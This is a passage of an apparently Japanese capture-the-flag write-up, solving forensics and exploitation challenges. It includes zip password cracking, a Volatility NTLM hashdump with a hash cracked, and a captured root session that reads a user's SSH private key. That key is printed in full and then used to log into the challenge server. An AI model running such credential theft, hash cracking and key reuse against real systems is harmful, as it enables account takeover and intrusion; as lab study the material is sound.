00002140: 2f4c 656e 6774 6820 3332 3035 2f53 7562  /Length 3205/Sub
00002150: 7479 7065 2f58 4d4c 2f54 7970 652f 4d65  type/XML/Type/Me
00002160: 7461 6461 7461 3e3e 7374 7265 616d 0d0a  tadata>>stream..
00002170: 3c3f 7870 6163 6b65 7420 6265 6769 6e3d  <?xpacket begin=
00002180: 22ef bbbf 2220 6964 3d22 5735 4d30 4d70  "..." id="W5M0Mp
00002190: 4365 6869 487a 7265 537a 4e54 637a 6b63  CehiHzreSzNTczkc
000021a0: 3964 223f 3e0a 3c78 3a78 6d70 6d65 7461  9d"?>.<x:xmpmeta
000021b0: 2078 6d6c 6e73 3a78 3d22 6164 6f62 653a   xmlns:x="adobe:
000021c0: 6e73 3a6d 6574 612f 2220 783a 786d 7074  ns:meta/" x:xmpt
000021d0: 6b3d 2241 646f 6265 2058 4d50 2043 6f72  k="Adobe XMP Cor
000021e0: 6520 352e 362d 6330 3137 2039 312e 3136  e 5.6-c017 91.16
000021f0: 3434 3634 2c20 3230 3230 2f30 362f 3135  4464, 2020/06/15
00002200: 2d31 303a 3230 3a30 3520 2020 2020 2020  -10:20:05       
00002210: 2022 3e0a 2020 203c 7264 663a 5244 4620   ">.   <rdf:RDF 
00002220: 786d 6c6e 733a 7264 663d 2268 7474 703a  xmlns:rdf="http:
00002230: 2f2f 7777 772e 7733 2e6f 7267 2f31 3939  //www.w3.org/199
00002240: 392f 3032 2f32 322d 7264 662d 7379 6e74  9/02/22-rdf-synt
00002250: 6178 2d6e 7323 223e 0a20 2020 2020 203c  ax-ns#">.      <
00002260: 7264 663a 4465 7363 7269 7074 696f 6e20  rdf:Description 
00002270: 7264 663a 6162 6f75 743d 2222 0a20 2020  rdf:about="".   
00002280: 2020 2020 2020 2020 2078 6d6c 6e73 3a78           xmlns:x
00002290: 6d70 3d22 6874 7470 3a2f 2f6e 732e 6164  mp="http://ns.ad
000022a0: 6f62 652e 636f 6d2f 7861 702f 312e 302f  obe.com/xap/1.0/
000022b0: 220a 2020 2020 2020 2020 2020 2020 786d  ".            xm
000022c0: 6c6e 733a 6463 3d22 6874 7470 3a2f 2f70  lns:dc="http://p
000022d0: 7572 6c2e 6f72 672f 6463 2f65 6c65 6d65  url.org/dc/eleme
000022e0: 6e74 732f 312e 312f 220a 2020 2020 2020  nts/1.1/".      
000022f0: 2020 2020 2020 786d 6c6e 733a 786d 704d        xmlns:xmpM
00002300: 4d3d 2268 7474 703a 2f2f 6e73 2e61 646f  M="http://ns.ado
00002310: 6265 2e63 6f6d 2f78 6170 2f31 2e30 2f6d  be.com/xap/1.0/m
00002320: 6d2f 220a 2020 2020 2020 2020 2020 2020  m/".            
00002330: 786d 6c6e 733a 7064 663d 2268 7474 703a  xmlns:pdf="http:
00002340: 2f2f 6e73 2e61 646f 6265 2e63 6f6d 2f70  //ns.adobe.com/p
00002350: 6466 2f31 2e33 2f22 3e0a 2020 2020 2020  df/1.3/">.      
00002360: 2020 203c 786d 703a 4d6f 6469 6679 4461     <xmp:ModifyDa
00002370: 7465 3e32 3032 312d 3037 2d31 3754 3230  te>2021-07-17T20
00002380: 3a35 393a 3234 2d30 353a 3030 3c2f 786d  :59:24-05:00</xm
00002390: 703a 4d6f 6469 6679 4461 7465 3e0a 2020  p:ModifyDate>.  
000023a0: 2020 2020 2020 203c 786d 703a 4372 6561         <xmp:Crea
000023b0: 7465 4461 7465 3e32 3032 312d 3037 2d31  teDate>2021-07-1
000023c0: 3754 3230 3a35 353a 3230 2d30 353a 3030  7T20:55:20-05:00
000023d0: 3c2f 786d 703a 4372 6561 7465 4461 7465  </xmp:CreateDate
000023e0: 3e0a 2020 2020 2020 2020 203c 786d 703a  >.         <xmp:
000023f0: 4d65 7461 6461 7461 4461 7465 3e32 3032  MetadataDate>202
00002400: 312d 3037 2d31 3754 3230 3a35 393a 3234  1-07-17T20:59:24
00002410: 2d30 353a 3030 3c2f 786d 703a 4d65 7461  -05:00</xmp:Meta
00002420: 6461 7461 4461 7465 3e0a 2020 2020 2020  dataDate>.      
00002430: 2020 203c 786d 703a 4372 6561 746f 7254     <xmp:CreatorT
00002440: 6f6f 6c3e 4164 6f62 6520 4163 726f 6261  ool>Adobe Acroba
00002450: 7420 5072 6f20 4443 2028 3332 2d62 6974  t Pro DC (32-bit
00002460: 2920 3231 2e35 2e32 3030 3538 3c2f 786d  ) 21.5.20058</xm
00002470: 703a 4372 6561 746f 7254 6f6f 6c3e 0a20  p:CreatorTool>. 
00002480: 2020 2020 2020 2020 3c64 633a 666f 726d          <dc:form
00002490: 6174 3e61 7070 6c69 6361 7469 6f6e 2f70  at>application/p
000024a0: 6466 3c2f 6463 3a66 6f72 6d61 743e 0a20  df</dc:format>. 
000024b0: 2020 2020 2020 2020 3c78 6d70 4d4d 3a44          <xmpMM:D
000024c0: 6f63 756d 656e 7449 443e 7575 6964 3a38  ocumentID>uuid:8
000024d0: 3037 3865 3261 652d 6437 3863 2d34 6633  078e2ae-d78c-4f3
000024e0: 652d 6164 6565 2d30 6164 3363 6233 3537  e-adee-0ad3cb357
000024f0: 6633 353c 2f78 6d70 4d4d 3a44 6f63 756d  f35</xmpMM:Docum
00002500: 656e 7449 443e 0a20 2020 2020 2020 2020  entID>.         
00002510: 3c78 6d70 4d4d 3a49 6e73 7461 6e63 6549  <xmpMM:InstanceI
00002520: 443e 7575 6964 3a37 3566 3362 3533 622d  D>uuid:75f3b53b-
00002530: 3664 6138 2d34 6361 362d 6163 3664 2d35  6da8-4ca6-ac6d-5
00002540: 6538 6536 3466 3536 3332 383c 2f78 6d70  e8e64f56328</xmp
00002550: 4d4d 3a49 6e73 7461 6e63 6549 443e 0a20  MM:InstanceID>. 
00002560: 2020 2020 2020 2020 3c70 6466 3a50 726f          <pdf:Pro
00002570: 6475 6365 723e 4164 6f62 6520 4163 726f  ducer>Adobe Acro
00002580: 6261 7420 5072 6f20 4443 2028 3332 2d62  bat Pro DC (32-b
00002590: 6974 2920 3231 2e35 2e32 3030 3538 3c2f  it) 21.5.20058</
000025a0: 7064 663a 5072 6f64 7563 6572 3e0a 2020  pdf:Producer>.  
000025b0: 2020 2020 3c2f 7264 663a 4465 7363 7269      </rdf:Descri
000025c0: 7074 696f 6e3e 0a20 2020 3c2f 7264 663a  ption>.   </rdf:
000025d0: 5244 463e 0a3c 2f78 3a78 6d70 6d65 7461  RDF>.</x:xmpmeta
000025e0: 3e0a 2020 2020 2020 2020 2020 2020 2020  >.              
000025f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002600: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002610: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002620: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002630: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002640: 2020 2020 2020 0a20 2020 2020 2020 2020        .         
00002650: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002660: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002670: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002680: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002690: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026a0: 2020 2020 2020 2020 2020 200a 2020 2020             .    
000026b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026d0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002700: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002710: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
00002720: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002730: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002740: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002750: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002760: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002770: 2020 2020 200a 2020 2020 2020 2020 2020       .          
00002780: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002790: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027a0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027d0: 2020 2020 2020 2020 2020 0a20 2020 2020            .     
000027e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002800: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002810: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002820: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002830: 2020 2020 2020 2020 2020 2020 2020 200a                 .
00002840: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002850: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002860: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002870: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002880: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002890: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028a0: 2020 2020 0a20 2020 2020 2020 2020 2020      .           
000028b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028d0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002900: 2020 2020 2020 2020 200a 2020 2020 2020           .      
00002910: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002920: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002930: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002940: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002950: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002960: 2020 2020 2020 2020 2020 2020 2020 0a20                . 
00002970: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002980: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002990: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029a0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029d0: 2020 200a 2020 2020 2020 2020 2020 2020     .            
000029e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a30: 2020 2020 2020 2020 0a20 2020 2020 2020          .       
00002a40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a60: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a90: 2020 2020 2020 2020 2020 2020 200a 2020               .  
00002aa0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ab0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ac0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ad0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ae0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002af0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b00: 2020 0a20 2020 2020 2020 2020 2020 2020    .             
00002b10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b30: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b60: 2020 2020 2020 200a 2020 2020 2020 2020         .        
00002b70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b90: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ba0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bb0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bc0: 2020 2020 2020 2020 2020 2020 0a20 2020              .   
00002bd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002be0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bf0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c30: 200a 2020 2020 2020 2020 2020 2020 2020   .              
00002c40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c60: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c90: 2020 2020 2020 0a20 2020 2020 2020 2020        .         
00002ca0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cb0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cc0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ce0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cf0: 2020 2020 2020 2020 2020 200a 2020 2020             .    
00002d00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d30: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d60: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
00002d70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d90: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002da0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002db0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002dc0: 2020 2020 200a 2020 2020 2020 2020 2020       .          
00002dd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002de0: 200a 3c3f 7870 6163 6b65 7420 656e 643d   .<?xpacket end=
00002df0: 2277 223f 3e0d 0a65 6e64 7374 7265 616d  "w"?>..endstream
00002e00: 0d65 6e64 6f62 6a0d 3320 3020 6f62 6a0d  .endobj.3 0 obj.
00002e10: 3c3c 2f46 696c 7465 722f 466c 6174 6544  <</Filter/FlateD
00002e20: 6563 6f64 652f 4669 7273 7420 342f 4c65  ecode/First 4/Le
00002e30: 6e67 7468 2034 392f 4e20 312f 5479 7065  ngth 49/N 1/Type
00002e40: 2f4f 626a 5374 6d3e 3e73 7472 6561 6d0d  /ObjStm>>stream.
00002e50: 0a68 deb2 5430 50b0 b1d1 77ce 2fcd 2b51  .h..T0P...w./.+Q
00002e60: 30d4 f7ce 4c29 8e36 3406 0a06 c5ea 8754  0...L).64......T
00002e70: 16a4 ea07 24a6 a716 dbd9 0104 1800 e035  ....$..........5
00002e80: 0baf 0d0a 656e 6473 7472 6561 6d0d 656e  ....endstream.en
00002e90: 646f 626a 0d34 2030 206f 626a 0d3c 3c2f  dobj.4 0 obj.<</
00002ea0: 4669 6c74 6572 2f46 6c61 7465 4465 636f  Filter/FlateDeco
00002eb0: 6465 2f46 6972 7374 2035 2f4c 656e 6774  de/First 5/Lengt
00002ec0: 6820 3132 342f 4e20 312f 5479 7065 2f4f  h 124/N 1/Type/O
00002ed0: 626a 5374 6d3e 3e73 7472 6561 6d0d 0a68  bjStm>>stream..h
00002ee0: de94 ccb1 0ac2 3014 46e1 57b9 5b93 a1ed  ......0.F.W.[...
00002ef0: 9fab 97aa 9442 6956 c107 e892 3419 baf4  .....BiV....4...
00002f00: 4288 efaf 20b8 38b9 9ff3 3910 681c fba5  B... .8...9.h...
00002f10: e450 773d 7ca8 d9f8 1b83 1d06 3730 4418  .Pw=|.......70D.
00002f20: 2da4 011a fba9 b498 3969 cc34 6f45 63a8  -.......9i.4oEc.
00002f30: f428 4a7e a1d5 9cb8 8d7b 5d2d b1eb a463  .(J~.....{]-...c
00002f40: 402e b6bf 6bfa 45af 7cfe a2ef 3d3d b7fc  @...k.E.|...==..
00002f50: 973a 4d2f 0106 0025 b931 ab0d 0a65 6e64  .:M/...%.1...end
00002f60: 7374 7265 616d 0d65 6e64 6f62 6a0d 3520  stream.endobj.5 
00002f70: 3020 6f62 6a0d 3c3c 2f44 6563 6f64 6550  0 obj.<</DecodeP
00002f80: 6172 6d73 3c3c 2f43 6f6c 756d 6e73 2034  arms<</Columns 4
00002f90: 2f50 7265 6469 6374 6f72 2031 323e 3e2f  /Predictor 12>>/
00002fa0: 4669 6c74 6572 2f46 6c61 7465 4465 636f  Filter/FlateDeco
00002fb0: 6465 2f49 445b 3c30 3246 3335 3839 3933  de/ID[<02F358993
00002fc0: 4331 4431 3434 4538 4346 3644 3246 3241  C1D144E8CF6D2F2A
00002fd0: 3237 3941 4334 463e 3c31 4542 3246 4231  279AC4F><1EB2FB1
00002fe0: 3932 3931 4443 4434 4439 3833 3937 3731  9291DCD4D9839771
00002ff0: 3539 4339 4137 3539 363e 5d2f 496e 666f  59C9A7596>]/Info
00003000: 2031 3020 3020 522f 4c65 6e67 7468 2034   10 0 R/Length 4
00003010: 382f 526f 6f74 2031 3220 3020 522f 5369  8/Root 12 0 R/Si
00003020: 7a65 2031 312f 5479 7065 2f58 5265 662f  ze 11/Type/XRef/
00003030: 575b 3120 3220 315d 3e3e 7374 7265 616d  W[1 2 1]>>stream
00003040: 0d0a 68de 6262 0002 2646 8528 0626 06c6  ..h.bb..&F.(.&..
00003050: 3b40 82f7 1290 60e8 0571 6f02 252e 4e06  ;@....`..qo.%.N.
00003060: 7119 1861 04d3 3f20 c1c8 0010 6000 ac4c  q..a..? ....`..L
00003070: 061d 0d0a 656e 6473 7472 6561 6d0d 656e  ....endstream.en
00003080: 646f 626a 0d73 7461 7274 7872 6566 0d0a  dobj.startxref..
00003090: 3131 360d 0a25 2545 4f46 0d0a            116..%%EOF..

これをhexdataに保存する。

$ cat hexdata | xxd -r > De\ Monne\ Customer\ Portal.pdf

このPDFにフラグが書いてあった。
f:id:satou-y:20211021231724p:plain

flag{deM0nn3_dat4_4_us}

File 101 (Forensics 200)

jpgの後にURLが書いてある。

https://www.dropbox.com/s/io1kaqznal2c10y/corrupted.zip?dl=0

ここからパスワード付きzipのcorrupted.zipをダウンロードし、zipのパスワードクラックを実行する。

$ fcrackzip -u -D -p dict/rockyou.txt corrupted.zip 


PASSWORD FOUND!!!!: pw == pumpkinpie
$ unzip -P pumpkinpie corrupted.zip 
Archive:  corrupted.zip
  inflating: FOR0x.png

FOR0x.pngファイルをバイナリエディタで見ると、実体はjpgの方が近い上に、ヘッダ部が壊れているので修正する。

・最初の4バイトは FF D8 FF E0に変更
・"jfif" → "JFIF"に変更

この画像の右下にフラグが書いてあった。
f:id:satou-y:20211021231939j:plain

flag{Easy_Right}

Not So Complicated (Exploitation 10)

$ volatility -f physmemraw --profile=Win10x64_19041 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual            Physical           Name
------------------ ------------------ ----

Volatility version 2だとこのOSバージョンのhivelistが取れないので、version 3を使う。

$ python3 vol.py -f ../work/physmemraw windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0
Progress:  100.00		PDB scanning finished                        
User	rid	lmhash	nthash

Administrator	500	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
Guest	501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount	503	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount	504	aad3b435b51404eeaad3b435b51404ee	0b51f04cf2a0d8f6f4469cd628a78776
Jimmie	1001	aad3b435b51404eeaad3b435b51404ee	0d757ad173d2fc249ce19364fd64c8ec
Admin	1003	aad3b435b51404eeaad3b435b51404ee	29b0d58e146d70278c29dc70f74f1e5d

JimmieのパスワードのNTLMハッシュ"0d757ad173d2fc249ce19364fd64c8ec"をCrackStationでクラックする。

flag{qwertyuiop}

The Root of All Evil... OR... Adding Insult to Injury (Exploitation 300)

sshのkeyがあるかを調べてみたら、以下のTCP Streamを見つけた。

whoami
root

echo "Stay away from Lytton Labs... you have been warned.  Dark Angel" > /da.txt
chmod 600 /da.txt
ls -al /
total 80
drwxr-xr-x  18 root root  4096 Aug 22 18:00 .
drwxr-xr-x  18 root root  4096 Aug 22 18:00 ..
lrwxrwxrwx   1 root root     7 Aug 21 20:19 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Aug 21 20:35 boot
-rw-------   1 root root    64 Aug 22 18:00 da.txt
drwxr-xr-x  18 root root  3180 Aug 22 17:21 dev
drwxr-xr-x 167 root root 12288 Aug 22 17:21 etc
drwxr-xr-x   4 root root  4096 Aug 21 20:29 home
lrwxrwxrwx   1 root root    34 Aug 21 20:34 initrd.img -> boot/initrd.img-5.10.0-kali9-amd64
lrwxrwxrwx   1 root root    34 Aug 21 20:19 initrd.img.old -> boot/initrd.img-5.10.0-kali7-amd64
lrwxrwxrwx   1 root root     7 Aug 21 20:19 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Aug 21 20:19 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Aug 21 20:19 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Aug 21 20:19 libx32 -> usr/libx32
drwx------   2 root root 16384 Aug 21 20:19 lost+found
drwxr-xr-x   3 root root  4096 May 28 03:26 media
drwxr-xr-x   2 root root  4096 May 28 03:26 mnt
drwxr-xr-x   3 root root  4096 Aug 21 20:19 opt
dr-xr-xr-x 199 root root     0 Aug 22 17:21 proc
drwx------   6 root root  4096 Aug 22 07:59 root
drwxr-xr-x  36 root root   900 Aug 22 17:21 run
lrwxrwxrwx   1 root root     8 Aug 21 20:19 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Aug 21 20:19 srv
dr-xr-xr-x  13 root root     0 Aug 22 17:21 sys
drwxrwxrwt  14 root root  4096 Aug 22 17:50 tmp
drwxr-xr-x  14 root root  4096 Aug 21 20:23 usr
drwxr-xr-x  12 root root  4096 Aug 21 20:23 var
lrwxrwxrwx   1 root root    31 Aug 21 20:34 vmlinuz -> boot/vmlinuz-5.10.0-kali9-amd64
lrwxrwxrwx   1 root root    31 Aug 21 20:23 vmlinuz.old -> boot/vmlinuz-5.10.0-kali7-amd64
cat da.txt
cat: da.txt: No such file or directory
cat /da.txt
Stay away from Lytton Labs... you have been warned.  Dark Angel

cat /home/luciafer/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

id_rsaをエクスポートし、PEM形式に変換して、SSH接続する。

$ cp id_rsa id_rsa.pem
$ ssh-keygen -p -m pem -f id_rsa.pem
Key has comment 'luciafer@dungeon'
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved with the new passphrase.
$ ssh -i id_rsa.pem luciafer@batescafe.deadface.io
The authenticity of host 'batescafe.deadface.io (164.90.158.159)' can't be established.
ECDSA key fingerprint is SHA256:n2x0TCmZ4LxU0LLlQ0jkx/Uin/f3mSFLjKPR15n0zC0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'batescafe.deadface.io' (ECDSA) to the list of known hosts.
luciafer@abee273c2782:~$ ls
Documents  Downloads  Music  Pictures  Videos
luciafer@abee273c2782:~$ ls -lRa
.:
total 40
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 root     root     4096 Oct 10 02:45 ..
-rw-r--r-- 1 luciafer luciafer  220 Oct 10 02:45 .bash_logout
-rw-r--r-- 1 luciafer luciafer 3771 Oct 10 02:45 .bashrc
-rw-r--r-- 1 luciafer luciafer  807 Oct 10 02:45 .profile
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Documents
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 Downloads
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Music
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Pictures
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Videos

./Documents:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Downloads:
total 12
